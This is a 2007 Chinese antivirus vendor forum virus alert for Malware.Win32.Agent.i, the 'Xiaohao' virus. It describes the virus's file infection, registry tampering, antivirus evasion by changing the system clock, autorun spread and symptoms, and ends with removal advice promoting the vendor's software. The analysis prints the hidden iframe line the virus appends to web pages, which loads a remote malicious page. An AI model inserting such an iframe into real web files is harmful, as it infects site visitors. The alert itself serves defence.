微点交流论坛 - 病毒快报 - 恶意程序 Malware.Win32.Agent.i(小浩病毒）

» 游客: 注册 | 登录 | 帮助

微点交流论坛 » 病毒快报 » 恶意程序 Malware.Win32.Agent.i(小浩病毒）

pioneer
超级版主

积分 4563
发帖 4545
注册 2007-7-16
来自 BJ

#1 恶意程序 Malware.Win32.Agent.i(小浩病毒）

病毒名称

Malware.Win32.Agent.i

捕获时间

2007-8-14

病毒症状

病毒分析：

该恶意程序运行后将自身文件拷贝到system32目录下，重命名为exloroe.exe；修改注册表破坏隐藏文件显示功能、隐藏开始菜单中的快捷方式；将系统时间修改为2005年1月17日使部分杀毒软件失效；修改注册表破坏破坏安全模式；隐藏所有非exe文件；在所有逻辑驱动器根目录下释放xiaohao.exe与autorun.inf；遍历除A驱以外的所有驱动器的根目录及其子目录，开始感染所有exe类型的PE文件；感染网页文件，在asp、aspx、htm、html、jsp、php等网页文件后追加“<iframe src=h**p://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>”的隐藏子页面；修改窗口标题为“已中毒 X14o-H4o's Virus”，记录被感染文件列表到C盘下Jilu.txt文件中。

中毒现象：

中毒后系统速度严重变慢，CPU资源居高不下；桌面以及开始菜单所有快捷方式被隐藏，没有被感染的文件大部分被隐藏，所有PE格式的exe文件图标变为“浩”字；双击盘符打不开，隐藏文件无法显示；系统时间被修改，杀毒软件提示过期；系统频繁出现“系统文件保护”（SFC）的提示，提示需要插入光盘进行恢复；重启计算机后系统无法启动。（参见图片1、2、3、4）

图一

图二

图三

图四

感染对象

Windows 2000/Windows XP/windows 2003

传播途径

网页传播、源代码泄漏、可移动存储传播

安全提示

已安装微点主动防御软件的用户，无论您是否已经升级到最新版本，微点主动防御都能够有效防御该恶意程序。如果您没有将微点主动防御软件升级到最新版，微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”，请直接选择删除处理，（参见图1）；如果您已经将微点主动防御软件升级到最新版本，微点将报警提示您发现Malware.Win32.Agent.i”，请直接选择删除（参见图2）。

示意图1

示意图2

使用其它杀毒软件的用户，请尽快将您的杀毒软件特征库升级到最新版本进行查杀，并开启防火墙拦截网络异常访问，如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。由于该病毒的特殊性，会自动终止某些杀毒软件运行，如果您的杀毒软件已经无法运行，您也可以尝试安装微点解决。

没有安装微点主动防御软件的用户，建议您尽快安装使用微点主动防御软件查杀预防各类新病毒。

※文章所有权归【pioneer】与【东方微点论坛】共同所有，转载请注明出处！※

2007-8-15 14:39

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号